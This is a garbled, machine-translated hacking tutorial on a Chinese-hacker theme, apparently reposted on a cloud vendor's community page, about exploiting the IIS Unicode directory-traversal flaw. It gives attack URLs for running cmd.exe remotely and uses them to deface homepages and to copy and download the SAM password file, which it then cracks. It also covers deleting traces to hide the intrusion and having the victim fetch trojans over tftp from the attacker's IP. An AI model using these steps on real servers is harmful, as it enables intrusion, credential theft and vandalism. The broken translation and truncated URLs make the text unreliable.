Unicode ultimate use of the "turn"

Source: Internet
Author: User
Tags 0xc0 contains copy execution iis net command sleep root directory
These days many of the Winnt servers have been hacked, especially at home. The following is a summary of some specific examples.
Following this type of vulnerability to find nearly a year, more than a year ago in the foreign hacker website has a similar article, but
Was not a lot of people pay attention to it at that time. , many of the anti-NATO hacking wars have been used in the following examples.
But until the discovery of the unicoude loophole, the Black NT computer became a fool. Below I put some recent articles in total
Knot.
I hope you can feel something from here. (The following article comes from some mailing lists and BBS)


Principle: (In fact, the original is very similar, I take this as an example.) )

The NSFocus security team found that IIS 4.0 and IIS 5.0 had a security vulnerability in the implementation of Unicode character decoding.
Causes the user to execute arbitrary commands remotely through IIS. When IIS opens the file, if the file name contains Unicode
character, it will decode it, and if the user provides some special encoding, it will cause IIS to open incorrectly or hold
Row some files outside of the Web root directory.
For the Chinese version of IIS 5.0/4.0, the file name of the URL request that IIS receives contains a special encoding such as "%C1%HH"
or "%c0%hh", it will first decode it into: 0xc10xhh, and then try to open this file, Windows system
Think 0XC10XHH may be Unicode encoding, so it will first decode it, if 0x00<=%hh < 0x40,
The decoded format is similar to the following format:
%c1%hh-> (0xc1-0xc0) * 0x40 + 0xhh
%c0%hh-> (0xc0-0xc0) * 0x40 + 0xhh
So, with this encoding, we can construct many characters, such as:
%c1%1c-> (0xc1-0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f-> (0xc0-0xc0) * 0x40 + 0x2f = 0x2f = ' \ '
An attacker could exploit this vulnerability to bypass IIS's path checks to execute or open arbitrary files.
(1) If the system contains an executable directory, arbitrary system commands may be executed. The following URL may
Lists the contents of the current directory:
Http://www.victim.com/scripts/..%c1.../cmd.exe?/c+dir
(2) It is possible to use this vulnerability to view the contents of a system file:
Http://www.victim.com/a.asp/..%c1%1..../winnt/win.ini
The Rain Forest Puppy test found that for the English version of IIS 4.0/5.0, the same problem
exists, but the coding format is slightly different and becomes "%c0%af" or "%c1%9c".
Our examples below are mainly%c1%1c.
Note: + number can be replaced with%20, in this format you can also construct a number of commands
A lot of site \inetpub\ under the Scripts directory deleted,
But \program Files\Common Files\system\ under
MSADC is still in the msadcs.dll loophole.
%C1%1C). You can then construct the request as follows:
Http://ip/msadc/..%c1%1c../..%c1%1c....exe?/c+dir+c:\


Practice One: (Modify the homepage----The most simplistic one)

Many intrusions have been made in the form of modifying the homepage, which is usually in two ways: one is to express oneself
Indignation-for example, after the United States-led NATO bombing my embassy in the south of the sudden incident, many domestic hackers
In ICQ, BBS Toruk Macto called, have to the enemy in various forms of attack, of course, to replace the home page Most great satisfaction!
Second, the network management sent an e-mail vulnerability report did not respond, and some hackers can not resist, the way to modify the home page to
To warn people about the importance of security technology. Of course it's illegal, so let's be careful.
Oh, don't light a moment of happiness, hehe!
You can use the echo command, pipe characters, and so on to create files and modify the contents of the file. However, because the IIS loader has detected a
Cmd. EXE or Command.com string will detect special characters "&| (,;%<> ", if found to have these characters will return
Back to 500 error, so you can not directly use the Cmd.eex plus pipe. So you can use copy CMD.EXE to change the name
Go around.
Http://xxx.xxx.xxx.xxx/scripts/..%c...scripts\ccc.exe
And then
Http://xxx.xxx.xxx.xxx/scripts/ccc....ked+by+chinese+>+f:\wwwroot\xxx\default.asp
Http://xxx.xxx.xxx.xxx/scripts/ccc....+echo+1/1/2001+>>+f:\wwwroot\xxx\default.asp
I changed the homepage!
This method is not convenient for the host with load balancing, and it needs several times to complete, so it is not good. Sango gave the
Another, more convenient approach. Refer to Sango (Yuange) post "IIS without copying CMD.EXE using pipe characters, etc.
Law, you can do this:
Http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd ". exe?/c+echo+hacked+by+
Hacker+>+f:\wwwroot\xxx\default.asp
Http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd ". exe?/c+echo+12/1/2k+>>+
F:\wwwroot\xxx\default.asp
In this way, the home page is changed to:
Hacked by hacker
12/1/2k
Of course, I did not do this, but these things I have in their own configuration in the context of the implementation,

In the course of my practice, I found that writing these with Echo is slow, and if you return several times, after a while the screen refreshes
The homepage will leave you with a number of content to write.




Practice Two (download Sam file)

Http://xxx.xxx.xxx.xxx/scripts/..%c.../winnt/system32
The/cmd.exe?/c+dir%20c:\ discovery lists all files under the remote host C:\,
Execution: http://xxx.xxx.xxx.xxx/scripts/. Á; /winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak successfully implements the replication of the file,
Executive: http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
Cmd.exe?/c+del%20c:\autoexec.bak successfully implemented the deletion of files, wow! It's too much.
Casually browsing a bit, because it is the host, do not want to sabotage, just want to practice practicing! Objective:
Get administrator privileges.
Executive: http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
Cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
Copy the Sam._ file into the wwwroot file and enter: Http://xxx.xxx.xxx.xxx/sam._
Download the Sam._ file to the local, execute:
Http://xxx.xxx.xxx.xxx/scripts/..%c...em32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._ clear traces.
In native execution: C:>expand sam._ Sam
Boot L0phtCrack 2.5 (available to http://rina.yofor.com/7index.html downloads), Import Sam
File ... Import Sam files, Open wordlist file ...
Open a dictionary, Run crack, obediently, to 17 hours, whatever it is, let it slowly break, sleep first
Sleep First! Five minutes later a look, the Administrator of Nt Password Incredibly is 123456, I fainted,
The network management attention, this kind of password also can take? Executive: C:\>newletmein \\xxx.xxx.xxx-admin
Scan host, found admin ID is: ASDFGHJK, execute: c:\>net use \\xxx.xxx.xxx.xxxc$
123456/USER:ASDFGHJK successfully linked to each other host, accomplished! Directory to log in:
Winnt\system32\logfiles looked at, hehe!

Practice three (with a Trojan horse)

If you are unfamiliar with net use, you can look for relevant information, Net command is also basic technology
Yes, well, master it. Set up a shared directory locally, such as f:\123, to Ncx99.exe and glacier services
The end is placed inside, and in order to test, put a 0-byte 1.txt, and then tftp98 the directory to point to
F:\123, now will let the other side to run Tftp.exe to download files!
Http://xxx.xxx.xxx.xxx/scripts/cmd....wwwroot\scripts
And then
Http://xxx.xxx.xxx.xxx/scripts/tftp...1.txt+cosys.txt
(111.111.111.111 represents our IP, or our TFTP server IP)
Look, return to the following content:
CGI bugs
The specified CGI application has a bug that does not return the complete HTTP title. The title that is returned is:

Transfer successful:0 bytes in 2 seconds, 0 bytes/s
It's a success! Look:
http://xxx.xxx.xxx.xxx/scripts/sys.exe?/c+



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.